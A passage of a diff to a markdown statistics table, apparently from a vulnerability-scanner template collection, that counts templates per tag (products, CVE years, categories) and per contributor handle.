-| asana | 5 | vinit989 | 1 | | | | | | | -| sftp | 5 | ayadi | 1 | | | | | | | -| glpi-project | 5 | smaranchand | 1 | | | | | | | -| resin | 5 | shivampand3y | 1 | | | | | | | -| jwt | 5 | ruppde | 1 | | | | | | | -| gocd | 5 | rivalsec | 1 | | | | | | | -| sysaid | 5 | 0xd0ff9 | 1 | | | | | | | -| apisix | 5 | hazana | 1 | | | | | | | -| mssql | 5 | tim_koopmans | 1 | | | | | | | -| parallels | 5 | floriandewald | 1 | | | | | | | -| avideo | 5 | unknown | 1 | | | | | | | -| thedigitalcraft | 5 | h4sh5 | 1 | | | | | | | -| axigen | 5 | wpsec | 1 | | | | | | | -| spark | 5 | shelld3v | 1 | | | | | | | -| matrix | 5 | amir-h-fallahi | 1 | | | | | | | -| moveit | 4 | sicksec | 1 | | | | | | | -| dom | 4 | unkl4b | 1 | | | | | | | -| pluginus | 4 | geraldino2 | 1 | | | | | | | -| phppgadmin | 4 | kba@sogeti_esec | 1 | | | | | | | -| proftpd | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| kyocera | 4 | failopen | 1 | | | | | | | -| zte | 4 | notwhy | 1 | | | | | | | -| bitrix | 4 | josecosta | 1 | | | | | | | -| heroku | 4 | bjhulst | 1 | | | | | | | -| learnpress | 4 | sak1 | 1 | | | | | | | -| env | 4 | _harleo | 1 | | | | | | | -| confluent | 4 | chetgan | 1 | | | | | | | -| newstatpress | 4 | yaser_s | 1 | | | | | | | -| mailchimp | 4 | irshadahamed | 1 | | | | | | | -| ebs | 4 | allenwest24 | 1 | | | | | | | -| osgeo | 4 | rotemreiss | 1 | | | | | | | -| creativeitem | 4 | petergrifin | 1 | | | | | | | -| hospital_management_system_project | 4 | jteles | 1 | | | | | | | -| pie-register | 4 | ahmetpergamum | 1 | | | | | | | -| concrete | 4 | clment cruchet | 1 | | | | | | | -| mooveagency | 4 | xstp | 1 | | | | | | | -| aria | 4 | justmumu | 1 | | | | | | | -| pmb_project | 4 | manasmbellani | 1 | | | | | | | -| newstatpress_project | 4 | jrolf | 1 | | | | | | | -| pega | 4 | lbb | 1 | | | | | | | -| royalevent | 4 | mlec | 1 | | | | | | | -| stripe | 4 | lingtren | 1 | | | | | | | -| pentaho | 4 | akokonunes | 1 | | | | | | | -| veronalabs | 4 | ola456 | 1 | | | | | | | -| aura | 4 | breno_css | 1 | | | | | | | -| httpserver | 4 | chesterblue | 1 | | | | | | | -| pip | 4 | kiks7 | 1 | | | | | | | -| h3c | 4 | am0nt31r0 | 1 | | | | | | | -| http | 4 | izn0u | 1 | | | | | | | -| joomlamo | 4 | kailashbohara | 1 | | | | | | | -| rabbitmq | 4 | myst7ic | 1 | | | | | | | -| flickr | 4 | couskito | 1 | | | | | | | -| roxy | 4 | ky9oss | 1 | | | | | | | -| powerjob | 4 | pdp | 1 | | | | | | | -| flink | 4 | hotpot | 1 | | | | | | | -| cnvd2022 | 4 | mchklt | 1 | | | | | | | -| reprisesoftware | 4 | sanineng | 1 | | | | | | | -| finicity | 4 | luqman | 1 | | | | | | | -| sigb | 4 | fur1na | 1 | | | | | | | -| mostracms | 4 | napgh0st | 1 | | | | | | | -| thimpress | 4 | aringo-bf | 1 | | | | | | | -| wcs | 4 | aaronchen0 | 1 | | | | | | | -| postmessage | 4 | opencirt | 1 | | | | | | | -| hongdian | 4 | prettyboyaaditya | 1 | | | | | | | -| churchcrm | 4 | co0nan | 1 | | | | | | | -| datadog | 4 | dali | 1 | | | | | | | -| ray | 4 | naglis | 1 | | | | | | | -| sugarcrm | 4 | screamy | 1 | | | | | | | -| jsf | 4 | ramondunker | 1 | | | | | | | -| rubyonrails | 4 | osamahamad | 1 | | | | | | | -| seagate | 4 | elouhi | 1 | | | | | | | -| panos | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| phpjabber | 4 | liquidsec | 1 | | | | | | | -| ternaria | 4 | droberson | 1 | | | | | | | -| dahuasecurity | 4 | ldionmarcil | 1 | | | | | | | -| artifactory | 4 | thelicato | 1 | | | | | | | -| search | 4 | sickwell | 1 | | | | | | | -| owncloud | 4 | mesaglio | 1 | | | | | | | -| djangoproject | 4 | xc1ym | 1 | | | | | | | -| metabase | 4 | lixts | 1 | | | | | | | -| shiro | 4 | mammad_rahimzada | 1 | | | | | | | -| puppet | 4 | ilovebinbash | 1 | | | | | | | -| eclipse | 4 | ahmed sherif | 1 | | | | | | | -| os4ed | 4 | win3zz | 1 | | | | | | | -| bittrex | 4 | samuelsamuelsamuel | 1 | | | | | | | -| arcgis | 4 | amanrawat | 1 | | | | | | | -| mostra | 4 | f0xy | 1 | | | | | | | -| linksys | 4 | micha3lb3n | 1 | | | | | | | -| intelbras | 4 | fmunozs | 1 | | | | | | | -| photo | 4 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| panabit | 4 | ratnadip gajbhiye | 1 | | | | | | | -| cnvd2019 | 4 | daviey | 1 | | | | | | | -| sound4 | 4 | nagli | 1 | | | | | | | -| auieo | 4 | jbertman | 1 | | | | | | | -| pixie | 4 | f1she3 | 1 | | | | | | | -| info | 4 | puben | 1 | | | | | | | -| opencms | 4 | ynnirc | 1 | | | | | | | -| linuxfoundation | 4 | high | 1 | | | | | | | -| kingsoft | 4 | arjunchandarana | 1 | | | | | | | -| juniper | 4 | miryangjung | 1 | | | | | | | -| horde | 4 | notsoevilweasel | 1 | | | | | | | -| nosqli | 4 | technicaljunkie | 1 | | | | | | | -| imgproxy | 4 | mayank_pandey01 | 1 | | | | | | | -| yeswiki | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| harbor | 4 | 5up3r541y4n | 1 | | | | | | | -| mautic | 4 | daffianfo | 1 | | | | | | | -| jellyfin | 4 | whynotke | 1 | | | | | | | -| metersphere | 4 | regala_ | 1 | | | | | | | -| salesforce | 4 | brabbit10 | 1 | | | | | | | -| purchase_order_management_system_project | 4 | jna1 | 1 | | | | | | | -| globalprotect | 4 | miguelsegoviagil | 1 | | | | | | | -| fit2cloud | 4 | narluin | 1 | | | | | | | -| password | 4 | mantissts | 1 | | | | | | | -| myeventon | 4 | infosecsanyam | 1 | | | | | | | -| osint-archived | 4 | hateshape | 1 | | | | | | | -| terra-master | 4 | dawid-czarnecki | 1 | | | | | | | -| igniterealtime | 4 | un-fmunozs | 1 | | | | | | | -| okta | 4 | omarkurt | 1 | | | | | | | -| jfrog | 4 | elitebaz | 1 | | | | | | | -| thinkcmf | 4 | 0ut0fb4nd | 1 | | | | | | | -| flatpress | 4 | professorabhay | 1 | | | | | | | -| mitel | 4 | jeya.seelan | 1 | | | | | | | -| ghost | 4 | sherlocksecurity | 1 | | | | | | | -| codeigniter | 4 | j33n1k4 | 1 | | | | | | | -| dotnet | 4 | cbadke | 1 | | | | | | | -| mantisbt | 4 | gpiechnik2 | 1 | | | | | | | -| casaos | 4 | dale clarke | 1 | | | | | | | -| ampache | 4 | luciannitescu | 1 | | | | | | | -| kentico | 4 | ndmalc | 1 | | | | | | | -| webshell | 4 | dorkerdevil | 1 | | | | | | | -| linkerd | 4 | aceseven (digisec360) | 1 | | | | | | | -| gnuboard | 4 | pjborah | 1 | | | | | | | -| harmistechnology | 4 | qlkwej | 1 | | | | | | | -| webmail | 4 | erikowen | 1 | | | | | | | -| wireguard | 4 | s1r1us | 1 | | | | | | | -| audiocodes | 4 | revblock | 1 | | | | | | | -| prtg | 4 | b4uh0lz | 1 | | | | | | | -| kevinlab | 4 | fpatrik | 1 | | | | | | | -| centos | 4 | stupidfish | 1 | | | | | | | -| telegram | 4 | 1nf1n7y | 1 | | | | | | | -| jorani | 4 | patralos | 1 | | | | | | | -| umbraco | 4 | banana69 | 1 | | | | | | | -| bamboo | 4 | sorrowx3 | 1 | | | | | | | -| sendgrid | 4 | 2rs3c | 1 | | | | | | | -| tiki | 4 | eremit4 | 1 | | | | | | | -| grav | 4 | abbas.heybati | 1 | | | | | | | -| httpd | 4 | _c0wb0y_ | 1 | | | | | | | -| age-encryption | 4 | whotwagner | 1 | | | | | | | -| esri | 4 | 0xkayala | 1 | | | | | | | -| dolibarr | 4 | tea | 1 | | | | | | | -| aspose | 4 | kaizensecurity | 1 | | | | | | | -| metasploit | 4 | carrot2 | 1 | | | | | | | -| kibana | 4 | sechunt3r | 1 | | | | | | | -| angular | 4 | elder tao | 1 | | | | | | | -| wp-statistics | 4 | mhdsamx | 1 | | | | | | | -| cve2005 | 4 | bugvsme | 1 | | | | | | | -| easypost | 4 | rodnt | 1 | | | | | | | -| nextjs | 4 | arall | 1 | | | | | | | -| consul | 4 | ap3r | 1 | | | | | | | -| candidats | 4 | omarjezi | 1 | | | | | | | -| rocketchat | 4 | deena | 1 | | | | | | | -| hongfan | 4 | kr1shna4garwal | 1 | | | | | | | -| mcafee | 4 | apple | 1 | | | | | | | -| springcloud | 4 | nerrorsec | 1 | | | | | | | -| supsystic | 4 | tehtbl | 1 | | | | | | | -| figma | 4 | shivanshkhari | 1 | | | | | | | -| d-link | 4 | ohlinge | 1 | | | | | | | -| zend | 4 | tirtha_mandal | 1 | | | | | | | -| articatech | 4 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| zeroshell | 3 | rumble773 | 1 | | | | | | | -| fanruan | 3 | mr.bobo hp | 1 | | | | | | | -| bitrix24 | 3 | yiran | 1 | | | | | | | -| lighttpd | 3 | alevsk | 1 | | | | | | | -| piwigo | 3 | icarot | 1 | | | | | | | -| apple | 3 | zn9988 | 1 | | | | | | | -| cybelesoft | 3 | berkdusunur | 1 | | | | | | | -| std42 | 3 | d0rkerdevil | 1 | | | | | | | -| siemens | 3 | 0xtavian | 1 | | | | | | | -| digitalrebar | 3 | kagamigawa | 1 | | | | | | | -| dotcms | 3 | akshansh | 1 | | | | | | | -| joomlacomponent.inetlanka | 3 | lady_bug | 1 | | | | | | | -| electron | 3 | 0xceeb | 1 | | | | | | | -| structurizr | 3 | jaskaran | 1 | | | | | | | -| openbmcs | 3 | axrk | 1 | | | | | | | -| wwbn | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| newsletter | 3 | byobin | 1 | | | | | | | -| monitorr | 3 | ahmed abou-ela | 1 | | | | | | | -| ampps | 3 | bartu utku sarp | 1 | | | | | | | -| osticket | 3 | bibeksapkota (sar00n) | 1 | | | | | | | -| smuggling | 3 | calumjelrick | 1 | | | | | | | -| nc | 3 | elmahdi | 1 | | | | | | | -| ninjaforms | 3 | th3r4id | 1 | | | | | | | -| fanwei | 3 | xshuden | 1 | | | | | | | -| epson | 3 | retr02332 | 1 | | | | | | | -| softwarepublico | 3 | therealtoastycat | 1 | | | | | | | -| csrf | 3 | chron0x | 1 | | | | | | | -| itop | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| tableau | 3 | sospiro | 1 | | | | | | | -| bash | 3 | cravaterouge | 1 | | | | | | | -| woodwing | 3 | gboddin | 1 | | | | | | | -| posh | 3 | dievus | 1 | | | | | | | -| dotnetnuke | 3 | majidmc2 | 1 | | | | | | | -| kfm | 3 | noamrathaus | 1 | | | | | | | -| securepoint | 3 | mihhailsokolov | 1 | | | | | | | -| opencart | 3 | booboohq | 1 | | | | | | | -| grp | 3 | furkansenan | 1 | | | | | | | -| sony | 3 | skylark-lab | 1 | | | | | | | -| ad | 3 | amirmsafari | 1 | | | | | | | -| lotus | 3 | httpvoid | 1 | | | | | | | -| particle | 3 | soyelmago | 1 | | | | | | | -| academylms | 3 | mah3sec_ | 1 | | | | | | | -| listserv | 3 | s1r1u5_ | 1 | | | | | | | -| axis | 3 | 0xparth | 1 | | | | | | | -| revive | 3 | esonhugh | 1 | | | | | | | -| revive-adserver | 3 | ipanda | 1 | | | | | | | -| esafenet | 3 | aravind | 1 | | | | | | | -| buffalo | 3 | jiheon-dev | 1 | | | | | | | -| sidekiq | 3 | yusakie | 1 | | | | | | | -| 3cx | 3 | becivells | 1 | | | | | | | -| key | 3 | lethargynavigator | 1 | | | | | | | -| axis2 | 3 | anon-artist | 1 | | | | | | | -| sonatype | 3 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| dev.pucit.edu.pk | 3 | evolutionsec | 1 | | | | | | | -| spotify | 3 | ransomsec | 1 | | | | | | | -| webkul-qloapps | 3 | spac3wh1te | 1 | | | | | | | -| covenant | 3 | rotembar | 1 | | | | | | | -| webcam | 3 | pwnwithlove | 1 | | | | | | | -| rancher | 3 | kareemse1im | 1 | | | | | | | -| instagram | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | +| prestashop | 22 | jpg0mez | 4 | | | | | | | +| cicd | 22 | wisnupramoedya | 4 | | | | | | | +| ecology | 21 | 3th1c_yuk1 | 4 | | | | | | | +| weblogic | 21 | incogbyte | 4 | | | | | | | +| printer | 21 | k0pak4 | 4 | | | | | | | +| dast | 21 | heeress | 4 | | | | | | | +| msf | 21 | ice3man543 | 4 | | | | | | | +| ftp | 20 | lum8rjack | 4 | | | | | | | +| jenkins | 20 | xxcdd | 4 | | | | | | | +| camera | 20 | 0xr2r | 4 | | | | | | | +| struts | 19 | scent2d | 4 | | | | | | | +| rukovoditel | 19 | dolev farhi | 4 | | | | | | | +| grafana | 19 | flx | 4 | | | | | | | +| wavlink | 19 | king-alexander | 4 | | | | | | | +| hp | 19 | e_schultze_ | 4 | | | | | | | +| confluence | 19 | cookiehanhoan | 4 | | | | | | | +| android | 18 | nybble04 | 4 | | | | | | | +| osint-music | 18 | h1ei1 | 4 | | | | | | | +| node.js | 18 | whoever | 3 | | | | | | | +| ruijie | 18 | e1a | 3 | | | | | | | +| vpn | 18 | atomiczsec | 3 | | | | | | | +| cve2011 | 18 | omranisecurity | 3 | | | | | | | +| coldfusion | 18 | thomas_from_offensity | 3 | | | | | | | +| mail | 17 | matt galligan | 3 | | | | | | | +| microweber | 17 | j3ssie | 3 | | | | | | | +| headless | 17 | evergreencartoons | 3 | | | | | | | +| azure | 17 | fxploit | 3 | | | | | | | +| honeypot | 17 | dr0pd34d | 3 | | | | | | | +| nginx | 17 | vagnerd | 3 | | | | | | | +| backup | 16 | binaryfigments | 3 | | | | | | | +| jarm | 16 | jarijaas | 3 | | | | | | | +| cve2009 | 16 | aringo | 3 | | | | | | | +| service | 16 | mavericknerd | 3 | | | | | | | +| rconfig | 16 | davidmckennirey | 3 | | | | | | | +| alibaba | 16 | z3bd | 3 | | | | | | | +| osint-blog | 16 | fyoorer | 3 | | | | | | | +| backdoor | 16 | andydoering | 3 | | | | | | | +| status | 16 | skeltavik | 3 | | | | | | | +| magento | 16 | johnjhacking | 3 | | | | | | | +| woocommerce | 15 | coldfish | 3 | | | | | | | +| redhat | 15 | taielab | 3 | | | | | | | +| ruby | 15 | imjust0 | 3 | | | | | | | +| netgear | 15 | splint3r7 | 3 | | | | | | | +| cve2008 | 15 | randomrobbie | 3 | | | | | | | +| cnvd2021 | 15 | _generic_human_ | 3 | | | | | | | +| seeyon | 15 | salts | 3 | | | | | | | +| setup | 15 | cheesymoon | 3 | | | | | | | +| cve2013 | 15 | dudez | 3 | | | | | | | +| installer | 15 | f1tz | 3 | | | | | | | +| tongda | 15 | yash anand @yashanand155 | 3 | | | | | | | +| dashboard | 15 | bernardofsr | 3 | | | | | | | +| java | 15 | parth | 3 | | | | | | | +| ssti | 15 | ambassify | 3 | | | | | | | +| zyxel | 15 | ekrause | 3 | | | | | | | +| nodejs | 15 | huowuzhao | 3 | | | | | | | +| nagios | 15 | impramodsargar | 3 | | | | | | | +| bypass | 15 | ph33r | 3 | | | | | | | +| moosocial | 15 | true13 | 3 | | | | | | | +| auth | 14 | me9187 | 3 | | | | | | | +| osint-art | 14 | farish | 3 | | | | | | | +| smtp | 14 | unstabl3 | 3 | | | | | | | +| jboss | 14 | lucasljm2001 | 3 | | | | | | | +| ivanti | 14 | canberbamber | 3 | | | | | | | +| creds-stuffing | 14 | vsh00t | 3 | | | | | | | +| rds | 14 | sushantkamble | 3 | | | | | | | +| redis | 14 | c4sper0 | 3 | | | | | | | +| info-leak | 14 | arcc | 3 | | | | | | | +| icewarp | 14 | securityforeveryone | 3 | | | | | | | +| dell | 14 | yuzhe-zhang-0 | 3 | | | | | | | +| node | 14 | 0w4ys | 3 | | | | | | | +| domainmod | 14 | shifacyclewala | 3 | | | | | | | +| git | 14 | isacaya | 3 | | | | | | | +| docker | 14 | swissky | 3 | | | | | | | +| npm | 14 | badboycxcc | 3 | | | | | | | +| osint-health | 14 | lark-lab | 3 | | | | | | | +| login-check | 14 | emenalf | 3 | | | | | | | +| mysql | 13 | alifathi-h1 | 3 | | | | | | | +| fortigate | 13 | xianke | 3 | | | | | | | +| hashicorp | 13 | bananabr | 2 | | | | | | | +| graphql | 13 | v0idc0de | 2 | | | | | | | +| airflow | 13 | parzival | 2 | | | | | | | +| abstractapi | 13 | pbuff07 | 2 | | | | | | | +| cuppa | 13 | joeldeleep | 2 | | | | | | | +| osint-political | 13 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| cuppacms | 13 | supras | 2 | | | | | | | +| sonicwall | 13 | thezakman | 2 | | | | | | | +| laravel | 13 | brenocss | 2 | | | | | | | +| fuzzing | 13 | bp0lr | 2 | | | | | | | +| osint-dating | 13 | egemenkochisarli | 2 | | | | | | | +| rails | 13 | manas_harsh | 2 | | | | | | | +| postgresql | 13 | serrapa | 2 | | | | | | | +| windows | 13 | kiblyn11 | 2 | | | | | | | +| webserver | 12 | uomogrande | 2 | | | | | | | +| jetbrains | 12 | dogancanbakir | 2 | | | | | | | +| kafka | 12 | x1m_martijn | 2 | | | | | | | +| netsweeper | 12 | dbrwsky | 2 | | | | | | | +| phpgurukul | 12 | notnotnotveg | 2 | | | | | | | +| zimbra | 12 | pxmme1337 | 2 | | | | | | | +| newrelic | 12 | foulenzer | 2 | | | | | | | +| ofbiz | 12 | arliya | 2 | | | | | | | +| drupal | 12 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| doppler | 12 | nkxxkn | 2 | | | | | | | +| smb | 12 | sascha brendel | 2 | | | | | | | +| vbulletin | 12 | lotusdll | 2 | | | | | | | +| dedecms | 11 | moritz nentwig | 2 | | | | | | | +| glpi | 11 | thardt-praetorian | 2 | | | | | | | +| iis | 11 | redteambrasil | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | ehsahil | 2 | | | | | | | +| django | 11 | charles d | 2 | | | | | | | +| online-fire-reporting | 11 | nvn1729 | 2 | | | | | | | +| spring | 11 | kre80r | 2 | | | | | | | +| xstream | 11 | 6mile | 2 | | | | | | | +| jolokia | 11 | hetroublemakr | 2 | | | | | | | +| phpmyadmin | 11 | sy3omda | 2 | | | | | | | +| cache | 11 | github.com/its0x08 | 2 | | | | | | | +| fastjson | 11 | t3l3machus | 2 | | | | | | | +| prometheus | 11 | ajaysenr | 2 | | | | | | | +| hikvision | 11 | cckuakilong | 2 | | | | | | | +| iam | 11 | thevillagehacker | 2 | | | | | | | +| osint-video | 11 | korteke | 2 | | | | | | | +| elasticsearch | 10 | mrharshvardhan | 2 | | | | | | | +| dropbox | 10 | herry | 2 | | | | | | | +| solarview | 10 | thabisocn | 2 | | | | | | | +| db | 10 | israel comazzetto dos reis | 2 | | | | | | | +| crlf | 10 | davidegirardi | 2 | | | | | | | +| thinkphp | 10 | dahse89 | 2 | | | | | | | +| zabbix | 10 | w4cky_ | 2 | | | | | | | +| progress | 10 | ree4pwn | 2 | | | | | | | +| dahua | 10 | paperpen | 2 | | | | | | | +| solr | 10 | kishore-hariram | 2 | | | | | | | +| samsung | 10 | 8arthur | 2 | | | | | | | +| sitecore | 10 | koti2 | 2 | | | | | | | +| xstream_project | 10 | shankaracharya | 2 | | | | | | | +| symfony | 10 | paradessia | 2 | | | | | | | +| digitalocean | 10 | florianmaak | 2 | | | | | | | +| cnvd2020 | 9 | rafaelwdornelas | 2 | | | | | | | +| vcenter | 9 | lstatro | 2 | | | | | | | +| blind | 9 | maximus decimus | 2 | | | | | | | +| python | 9 | ricardo maia (brainfork) | 2 | | | | | | | +| opencats | 9 | clarkvoss | 2 | | | | | | | +| exchange | 9 | joshlarsen | 2 | | | | | | | +| gitea | 9 | 666asd | 2 | | | | | | | +| kube | 9 | ep1csage | 2 | | | | | | | +| pfsense | 9 | 0xrudra | 2 | | | | | | | +| scada | 9 | danielmofer | 2 | | | | | | | +| versa | 9 | z0ne | 2 | | | | | | | +| console | 9 | k11h-de | 2 | | | | | | | +| druid | 9 | gevakun | 2 | | | | | | | +| sangfor | 9 | g4l1t0 | 2 | | | | | | | +| secret | 9 | geekby | 2 | | | | | | | +| wso2 | 9 | zy9ard3 | 2 | | | | | | | +| bitbucket | 9 | socketz | 2 | | | | | | | +| moodle | 9 | usdag | 2 | | | | | | | +| lucee | 9 | h0j3n | 2 | | | | | | | +| gateway | 9 | 0xnirvana | 2 | | | | | | | +| sophos | 9 | vavkamil | 2 | | | | | | | +| joomla\! | 9 | myztique | 2 | | | | | | | +| cloudtrail | 9 | ayadim | 2 | | | | | | | +| artica | 9 | n-thumann | 2 | | | | | | | +| f5 | 9 | topscoder | 2 | | | | | | | +| elastic | 9 | amirhossein raeisi | 2 | | | | | | | +| firebase | 9 | supr4s | 2 | | | | | | | +| facebook | 9 | y4er | 2 | | | | | | | +| go | 8 | martincodes-de | 2 | | | | | | | +| manager | 8 | sbani | 2 | | | | | | | +| bucket | 8 | christianpoeschl | 2 | | | | | | | +| nagiosxi | 8 | cocxanh | 2 | | | | | | | +| emerge | 8 | udit_thakkur | 2 | | | | | | | +| spotweb | 8 | zomsop82 | 2 | | | | | | | +| openemr | 8 | 0xsapra | 2 | | | | | | | +| odoo | 8 | sinkettu | 2 | | | | | | | +| discord | 8 | msegoviag | 2 | | | | | | | +| lfprojects | 8 | bing0o | 2 | | | | | | | +| atom | 8 | amsda | 2 | | | | | | | +| phpinfo | 8 | 0xcrypto | 2 | | | | | | | +| hms | 8 | joshua rogers | 2 | | | | | | | +| osint-news | 8 | charles d. | 2 | | | | | | | +| metadata | 8 | shelled | 2 | | | | | | | +| unauthenticated | 8 | codexlynx | 2 | | | | | | | +| config-audit | 8 | 0xelkomy | 2 | | | | | | | +| recon | 8 | convisoappsec | 2 | | | | | | | +| phpjabbers | 8 | d4vy | 2 | | | | | | | +| cisco-switch | 8 | gal nagli | 2 | | | | | | | +| microfocus | 8 | randomdhiraj | 2 | | | | | | | +| exploitdb | 8 | raesene | 2 | | | | | | | +| symantec | 8 | brucelsone | 2 | | | | | | | +| mlflow | 8 | liwermor | 2 | | | | | | | +| spotweb_project | 8 | bmcel | 2 | | | | | | | +| instrusive | 8 | mohammedsaneem | 2 | | | | | | | +| ognl | 8 | dheerajmadhukar | 2 | | | | | | | +| e-office | 8 | nuk3s3c | 2 | | | | | | | +| mirai | 8 | wa1tf0rme | 2 | | | | | | | +| nexus | 8 | michal mikolas (nanuqcz) | 2 | | | | | | | +| oauth | 8 | c3l3si4n | 2 | | | | | | | +| wanhu | 8 | streetofhackerr007 | 2 | | | | | | | +| error | 8 | hackerarpan | 2 | | | | | | | +| huawei | 8 | danmcinerney | 2 | | | | | | | +| default-page | 8 | afaq | 2 | | | | | | | +| cloud-enum | 8 | mzack9999 | 2 | | | | | | | +| mongodb | 7 | luci | 2 | | | | | | | +| fpd | 7 | bsysop | 2 | | | | | | | +| fortios | 7 | 0xsmiley | 2 | | | | | | | +| mobileiron | 7 | ilovebinbash | 1 | | | | | | | +| landray | 7 | paper-pen | 1 | | | | | | | +| websphere | 7 | matthew nickerson (b0than) @ | 1 | | | | | | | | | | layer 8 security | | | | | | | | -| sudo | 3 | oscarintherocks | 1 | | | | | | | -| labkey | 3 | luskabol | 1 | | | | | | | -| decision-server | 3 | jaimin gondaliya | 1 | | | | | | | -| cluster | 3 | yashanand155 | 1 | | | | | | | -| movable | 3 | matt miller | 1 | | | | | | | -| projectsend | 3 | christbowel | 1 | | | | | | | -| droneci | 3 | null_hypothesis | 1 | | | | | | | -| etcd | 3 | alexrydzak | 1 | | | | | | | -| graph | 3 | zeyad azima | 1 | | | | | | | -| petya | 3 | mrcl0wnlab | 1 | | | | | | | -| magnolia | 3 | gonski | 1 | | | | | | | -| purchase-order-management-system | 3 | udinchan | 1 | | | | | | | -| boldgrid | 3 | viniciuspereiras | 1 | | | | | | | -| webnus | 3 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| automattic | 3 | galoget | 1 | | | | | | | -| messaging | 3 | sttlr | 1 | | | | | | | -| phpipam | 3 | shiar | 1 | | | | | | | -| contribsys | 3 | udyz | 1 | | | | | | | -| western_digital | 3 | dmartyn | 1 | | | | | | | -| superadmin | 3 | david botelho mariano | 1 | | | | | | | -| tautulli | 3 | w0tx | 1 | | | | | | | -| sqlite | 3 | jonathanwalker | 1 | | | | | | | -| mapbox | 3 | fopina | 1 | | | | | | | -| forgerock | 3 | jcockhren | 1 | | | | | | | -| geowebserver | 3 | defektive | 1 | | | | | | | -| idrac | 3 | mubassirpatel | 1 | | | | | | | -| empirecms | 3 | ok_bye_now | 1 | | | | | | | -| school_dormitory_management_system_project | 3 | b0yd | 1 | | | | | | | -| influxdb | 3 | west-wise | 1 | | | | | | | -| cpanel | 3 | drfabiocastro | 1 | | | | | | | -| payara | 3 | bad5ect0r | 1 | | | | | | | -| monitor | 3 | p-l- | 1 | | | | | | | -| fuelcms | 3 | pudsec | 1 | | | | | | | -| superset | 3 | miroslavsotak | 1 | | | | | | | -| credential | 3 | remi gascou (podalirius) | 1 | | | | | | | -| hsphere | 3 | igibanez | 1 | | | | | | | -| default | 3 | akash.c | 1 | | | | | | | -| netdata | 3 | bjxsec | 1 | | | | | | | -| switch | 3 | n0el4kls | 1 | | | | | | | -| ithemes | 3 | djoevanka | 1 | | | | | | | -| self-hosted | 3 | duty_1g | 1 | | | | | | | -| ueditor | 3 | nytr0gen | 1 | | | | | | | -| httpbin | 3 | archer | 1 | | | | | | | -| afterlogic | 3 | yavolo | 1 | | | | | | | -| xoops | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| shopify | 7 | jonathanwalker | 1 | | | | | | | +| keking | 7 | piyushchhiroliya | 1 | | | | | | | +| vms | 7 | team syslifters / christoph | 1 | | | | | | | +| | | mahrl | | | | | | | | +| blockchain | 7 | bugvsme | 1 | | | | | | | +| nacos | 7 | borna nematzadeh | 1 | | | | | | | +| pmb | 7 | ptonewreckin | 1 | | | | | | | +| bigip | 7 | gboddin | 1 | | | | | | | +| slack | 7 | icarot | 1 | | | | | | | +| twitter | 7 | mlec | 1 | | | | | | | +| teamcity | 7 | f1she3 | 1 | | | | | | | +| nortekcontrol | 7 | majidmc2 | 1 | | | | | | | +| cacti | 7 | jteles | 1 | | | | | | | +| bloofox | 7 | arr0way | 1 | | | | | | | +| gogs | 7 | udinchan | 1 | | | | | | | +| vpc | 7 | exceed | 1 | | | | | | | +| maps | 7 | cbadke | 1 | | | | | | | +| rfi | 7 | vinit989 | 1 | | | | | | | +| solarwinds | 7 | brianlam38 | 1 | | | | | | | +| contec | 7 | n0el4kls | 1 | | | | | | | +| ruckus | 7 | petergrifin | 1 | | | | | | | +| activemq | 7 | remonsec | 1 | | | | | | | +| monstra | 7 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| telesquare | 7 | bywalks | 1 | | | | | | | +| linkedin | 7 | mchklt | 1 | | | | | | | +| avtech | 7 | patrick pirker | 1 | | | | | | | +| oos | 7 | kagamigawa | 1 | | | | | | | +| vrealize | 7 | justmumu | 1 | | | | | | | +| filemanager | 7 | rodnt | 1 | | | | | | | +| moodating | 7 | f0xy | 1 | | | | | | | +| squirrelmail | 7 | ok_bye_now | 1 | | | | | | | +| opensis | 7 | 0h1in9e | 1 | | | | | | | +| database | 7 | patralos | 1 | | | | | | | +| car_rental_management_system_project | 7 | null_hypothesis | 1 | | | | | | | +| leak | 6 | 5up3r541y4n | 1 | | | | | | | +| sonarqube | 6 | tehtbl | 1 | | | | | | | +| zhiyuan | 6 | tirtha_mandal | 1 | | | | | | | +| microstrategy | 6 | vulnspace | 1 | | | | | | | +| gcp | 6 | jeya seelan | 1 | | | | | | | +| liferay | 6 | carrot2 | 1 | | | | | | | +| chanjet | 6 | naglis | 1 | | | | | | | +| cockpit | 6 | miryangjung | 1 | | | | | | | +| splunk | 6 | invisiblethreat | 1 | | | | | | | +| beyondtrust | 6 | ldionmarcil | 1 | | | | | | | +| webmin | 6 | daffianfo | 1 | | | | | | | +| cobbler | 6 | push4d | 1 | | | | | | | +| servicenow | 6 | aaronchen0 | 1 | | | | | | | +| 74cms | 6 | bjxsec | 1 | | | | | | | +| tikiwiki | 6 | mukundbhuva | 1 | | | | | | | +| jamf | 6 | iampritam | 1 | | | | | | | +| kubelet | 6 | realexp3rt | 1 | | | | | | | +| paypal | 6 | pphuahua | 1 | | | | | | | +| elfinder | 6 | brabbit10 | 1 | | | | | | | +| rat | 6 | dievus | 1 | | | | | | | +| sql | 6 | ph33rr | 1 | | | | | | | +| asp | 6 | technicaljunkie | 1 | | | | | | | +| server | 6 | b4uh0lz | 1 | | | | | | | +| keycloak | 6 | dali | 1 | | | | | | | +| typo3 | 6 | thebinitghimire | 1 | | | | | | | +| minio | 6 | palanichamy_perumal | 1 | | | | | | | +| openvpn | 6 | xc1ym | 1 | | | | | | | +| plesk | 6 | secthebit | 1 | | | | | | | +| couchdb | 6 | natto97 | 1 | | | | | | | +| ldap | 6 | sec_hawk | 1 | | | | | | | +| synacor | 6 | harryha | 1 | | | | | | | +| jetty | 6 | miguelsegoviagil | 1 | | | | | | | +| doctor-appointment-system | 6 | kailashbohara | 1 | | | | | | | +| flutterwave | 